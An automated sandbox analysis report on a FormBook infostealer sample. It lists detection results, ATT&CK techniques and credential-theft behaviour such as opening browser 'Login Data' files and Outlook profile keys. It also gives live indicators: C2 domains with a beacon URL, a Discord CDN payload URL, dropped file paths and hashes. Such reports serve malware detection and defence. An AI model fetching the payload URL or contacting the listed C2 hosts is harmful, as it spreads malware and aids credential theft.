Code function: 21_2_00F11B03 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

21_2_00F11B03

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\SysWOW64\ipconfig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Registry Run Keys / Startup Folder1	Process Injection912	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution1	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Obfuscated Files or Information3	Credential API Hooking1	File and Directory Discovery2	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing1	Security Account Manager	System Information Discovery13	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Timestomp1	NTDS	Security Software Discovery121	Distributed Component Object Model	Credential API Hooking1	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rootkit1	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading2	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion2	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection912	Proc Filesystem	System Network Configuration Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
f97e137e_by_Libranalysis.exe	26%	Virustotal		Browse
f97e137e_by_Libranalysis.exe	30%	ReversingLabs	Win32.Infostealer.Fareit
f97e137e_by_Libranalysis.exe	100%	Avira	HEUR/AGEN.1104239

Dropped Files

Source	Detection	Scanner	Link
C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	0%	Virustotal	Browse
C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	0%	Metadefender	Browse
C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Adrldefcp\vp21b7dsh.exe	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\Adrldefcp\vp21b7dsh.exe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\Adrldefcp\vp21b7dsh.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.secinit.exe.10410000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
0.0.f97e137e_by_Libranalysis.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1104239		Download File

Domains

Source	Detection	Scanner	Link
www.joomlas123.info	10%	Virustotal	Browse
www.589man.com	1%	Virustotal	Browse
www.beepot.tech	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
www.joomlas123.info/3nop/	14%	Virustotal		Browse
www.joomlas123.info/3nop/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.joomlas123.info/3nop/?_jRpk=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOoR28nrdMHB&ofrxU8=xVMtBJ50	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.134.233	true	false		high
www.joomlas123.info	199.192.24.139	true	true	10%, Virustotal, Browse	unknown
www.589man.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.beepot.tech	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.joomlas123.info/3nop/	true	14%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.joomlas123.info/3nop/?_jRpk=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOoR28nrdMHB&ofrxU8=xVMtBJ50	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/831802482459672609/839049205866561576/Vylsmojatnhhurydzinydcl	f97e137e_by_Libranalysis.exe, 00000000.00000003.653912925.0000000000789000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 00000003.00000002.922678107.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
199.192.24.139	www.joomlas123.info	United States		22612	NAMECHEAP-NETUS	true
162.159.134.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	403818
Start date:	04.05.2021
Start time:	12:31:35
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	f97e137e_by_Libranalysis (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@12/9@6/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 28.5% (good quality ratio 25.8%) Quality average: 75% Quality standard deviation: 30.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 67 Number of non-executed functions: 169
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Excluded IPs from analysis (whitelisted): 13.107.246.254, 104.43.193.48, 52.147.198.201, 13.64.90.137, 20.82.210.154, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, t-ring.msedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, blobcollector.events.data.trafficmanager.net, t-ring.t-9999.t-msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:32:24	API Interceptor	2x Sleep call for process: f97e137e_by_Libranalysis.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
199.192.24.139	New order.04272021.DOC.exe	Get hash	malicious	Browse	www.joomlas123.info/3nop/?EvR85L=hBjlaxTH1Ha&ArR=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpNEr19LQe7mQ+0IHiQ==
	#U0441#U0447#U0435#U0442-#U043f#U0440#U043e#U0444#U043e#U0440#U043c#U0430 pdf.exe	Get hash	malicious	Browse	www.joomlas123.info/n7ak/
	Factura proforma, nuevo pedido.exe	Get hash	malicious	Browse	www.joomlas123.info/3nop/?X2MxCnd0=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOo7pMXrZOPB&Ezr=UVIxmz00MxMt
	#U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exe	Get hash	malicious	Browse	www.joomlas123.info/n7ak/
	PO_98276300.exe	Get hash	malicious	Browse	www.psm-gen.com/ame8/?Cb=hN98bjZH&8p=atEp9HmZAS1HtoOZmTHK+Mkht0pNqxkiDqK4GuvFFh3swg7bz1pQN9/xGbnnC470xPoO
	PO2364#FD212003.exe	Get hash	malicious	Browse	www.psm-gen.com/p95n/?-Z=V6ALdRq0&v6=3x9Q4tu1mM1mfOGCS5myv3Ovs0F4IhtiWoTamKkI+VHOWU/+l6jpIKxR/Zu1Jtkg0uvX
162.159.134.233	VMKwliCGEP.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785611664095313920/785649743954706472/bin.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	Remittance Advice pdf.exe	Get hash	malicious	Browse	162.159.130.233
	0d69e4f6_by_Libranalysis.xls	Get hash	malicious	Browse	162.159.129.233
	6de2089f_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.133.233
	Almadeena-Bakery-005445536555665445.scr.exe	Get hash	malicious	Browse	162.159.129.233
	To1sRo1E8P.exe	Get hash	malicious	Browse	162.159.130.233
	wNgiGmsOwT.exe	Get hash	malicious	Browse	162.159.129.233
	BhTxt5BUvy.exe	Get hash	malicious	Browse	162.159.133.233
	rSYbV3jx0K.exe	Get hash	malicious	Browse	162.159.129.233
	04282021.DOC.exe	Get hash	malicious	Browse	162.159.130.233
	SkKcQaHEB8.exe	Get hash	malicious	Browse	162.159.130.233
	P20200107.DOC	Get hash	malicious	Browse	162.159.130.233
	FBRO ORDER SHEET - YATSAL SUMMER 2021.exe	Get hash	malicious	Browse	162.159.130.233
	New order.04272021.DOC.exe	Get hash	malicious	Browse	162.159.134.233
	Payment-Confirmation_Copy.exe	Get hash	malicious	Browse	162.159.133.233
	Q264003.exe	Get hash	malicious	Browse	162.159.130.233
	Camscanner.New Order.09878766.exe	Get hash	malicious	Browse	162.159.135.233
	doc07621220210416113300.exe	Get hash	malicious	Browse	162.159.129.233
	REF # 166060421.doc	Get hash	malicious	Browse	162.159.133.233
	File Attached.exe	Get hash	malicious	Browse	162.159.133.233
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	162.159.130.233
www.joomlas123.info	New order.04272021.DOC.exe	Get hash	malicious	Browse	199.192.24.139
	#U0441#U0447#U0435#U0442-#U043f#U0440#U043e#U0444#U043e#U0440#U043c#U0430 pdf.exe	Get hash	malicious	Browse	199.192.24.139
	Factura proforma, nuevo pedido.exe	Get hash	malicious	Browse	199.192.24.139
	#U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exe	Get hash	malicious	Browse	199.192.24.139
	acil siparis.exe	Get hash	malicious	Browse	198.54.112.96
	Slip-Scan-Kopie.exe	Get hash	malicious	Browse	198.54.112.96
	DOC_3022719.exe	Get hash	malicious	Browse	198.54.112.96
	Scan_ 034 (1).exe	Get hash	malicious	Browse	198.54.112.96
	El nuevo pedido esta en la lista adjunta.exe	Get hash	malicious	Browse	198.54.112.96
	sifaris pdf.exe	Get hash	malicious	Browse	198.54.112.96
	porosin#U00eb e ofert#U00ebs.exe	Get hash	malicious	Browse	198.54.112.96
	Angebot bestellen.exe	Get hash	malicious	Browse	198.54.112.96
	file.exe	Get hash	malicious	Browse	198.54.112.96
	offer order.exe	Get hash	malicious	Browse	198.54.112.96
	list of our new purchase order.exe	Get hash	malicious	Browse	198.54.112.96
	3e#U0433.exe	Get hash	malicious	Browse	198.54.112.96
	predracuna.exe	Get hash	malicious	Browse	198.54.112.96

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	heUGqZXAJv.exe	Get hash	malicious	Browse	198.54.126.101
	Proforma Invoice.exe	Get hash	malicious	Browse	198.54.116.236
	w73FtMA4ZTl9NFm.exe	Get hash	malicious	Browse	198.54.117.212
	Synchronoss Payment.html	Get hash	malicious	Browse	199.192.16.144
	PO KV18RE001-A5193.doc	Get hash	malicious	Browse	198.54.122.60
	Receipt 309210k.exe	Get hash	malicious	Browse	199.193.7.228
	FROCH ENTERPRISE PROFILE.doc	Get hash	malicious	Browse	198.54.122.60
	purchase order.doc	Get hash	malicious	Browse	198.54.122.60
	LAjei2S8bg.exe	Get hash	malicious	Browse	198.54.122.60
	QEpa8OLm9Z.exe	Get hash	malicious	Browse	198.54.122.60
	calvary petroleum.doc	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.PackedNET.405.1325.exe	Get hash	malicious	Browse	198.54.122.60
	PO#453882.exe	Get hash	malicious	Browse	199.193.7.228
	customer request.exe	Get hash	malicious	Browse	198.54.126.165
	PO #4568.exe	Get hash	malicious	Browse	162.0.229.222
	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse	198.54.122.60
	Sidertaglio PO_20210305.doc	Get hash	malicious	Browse	198.54.122.60
	WORK 152021.exe	Get hash	malicious	Browse	68.65.120.142
	WORK 152021.exe	Get hash	malicious	Browse	68.65.120.142
	WORK 152021.exe	Get hash	malicious	Browse	68.65.120.142
CLOUDFLARENETUS	heUGqZXAJv.exe	Get hash	malicious	Browse	104.21.33.129
	6ccd0000.bilper.dll	Get hash	malicious	Browse	104.20.184.68
	6bae0000.bilper.dll	Get hash	malicious	Browse	104.20.184.68
	6c130000.da.dll	Get hash	malicious	Browse	104.20.184.68
	gNRcIqPGkE.exe	Get hash	malicious	Browse	104.21.21.140
	Halkbank_Ekstre_20210504_080203_744632.exe	Get hash	malicious	Browse	104.21.19.200
	3QHQELjQ1s.exe	Get hash	malicious	Browse	104.21.21.140
	EXPEDIENTE CSJVAA 20-43.js	Get hash	malicious	Browse	104.26.5.223
	valuePasteList.dll	Get hash	malicious	Browse	104.20.184.68
	Payment Invoice.pdf.exe	Get hash	malicious	Browse	104.23.98.190
	oiY37pLlj7.exe	Get hash	malicious	Browse	172.67.208.174
	MV RED SEA.docx	Get hash	malicious	Browse	172.67.8.238
	MV RED SEA.docx	Get hash	malicious	Browse	104.22.0.232
	TT1eJMw4qZ.exe	Get hash	malicious	Browse	172.67.135.135
	202139769574 Shipping Documents.exe	Get hash	malicious	Browse	23.227.38.74
	Documents_111651917_375818984.xls	Get hash	malicious	Browse	104.21.64.132
	Documents_111651917_375818984.xls	Get hash	malicious	Browse	172.67.151.10
	813oo3jeWE.exe	Get hash	malicious	Browse	104.23.98.190
	4GGwmv0AJm.exe	Get hash	malicious	Browse	23.227.38.32
	c647b2da_by_Libranalysis.exe	Get hash	malicious	Browse	104.26.13.9

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	e1df57de_by_Libranalysis.xls	Get hash	malicious	Browse	162.159.134.233
	MV RED SEA.docx	Get hash	malicious	Browse	162.159.134.233
	MyUY1HeWNL.exe	Get hash	malicious	Browse	162.159.134.233
	IMG-WA7905432.exe	Get hash	malicious	Browse	162.159.134.233
	catalog-1521295750.xlsm	Get hash	malicious	Browse	162.159.134.233
	Documents_111651917_375818984.xls	Get hash	malicious	Browse	162.159.134.233
	Remittance Advice pdf.exe	Get hash	malicious	Browse	162.159.134.233
	#U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm	Get hash	malicious	Browse	162.159.134.233
	Documents_95326461_1831689059.xls	Get hash	malicious	Browse	162.159.134.233
	Tree Top.html	Get hash	malicious	Browse	162.159.134.233
	PT6-1152.doc	Get hash	malicious	Browse	162.159.134.233
	s.dll	Get hash	malicious	Browse	162.159.134.233
	setup-lightshot.exe	Get hash	malicious	Browse	162.159.134.233
	s.dll	Get hash	malicious	Browse	162.159.134.233
	8a793b14_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.134.233
	pic05678063.exe	Get hash	malicious	Browse	162.159.134.233
	6de2089f_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.134.233
	e17486cd_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.134.233
	Almadeena-Bakery-005445536555665445.scr.exe	Get hash	malicious	Browse	162.159.134.233
	Purchase Order comfirmation to issue INVOICE.html	Get hash	malicious	Browse	162.159.134.233

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	04282021.DOC.exe	Get hash	malicious	Browse
	apr.20.confirmaci#U0e02n SWIFT.exe	Get hash	malicious	Browse
	Factura proforma, nuevo pedido.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Adrldefcp\vp21b7dsh.exe	04282021.DOC.exe	Get hash	malicious	Browse
	apr.20.confirmaci#U0e02n SWIFT.exe	Get hash	malicious	Browse
	Factura proforma, nuevo pedido.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	4.742830409323469
Encrypted:	false
SSDEEP:	192:zKNdbN1XcCQYb6Q1g7htLtQQkZW8vUzRiW+:z4N1Xcs6Q1g7vOrZW8vUzRiW+
MD5:	174A363BB5A2D88B224546C15DD10906
SHA1:	10D758A2A180829C47360AFD30BE09FB295E6452
SHA-256:	D7EE783F0D00335118F82314239B3A73A6CFCD406E8FAE9C052D620834E897A9
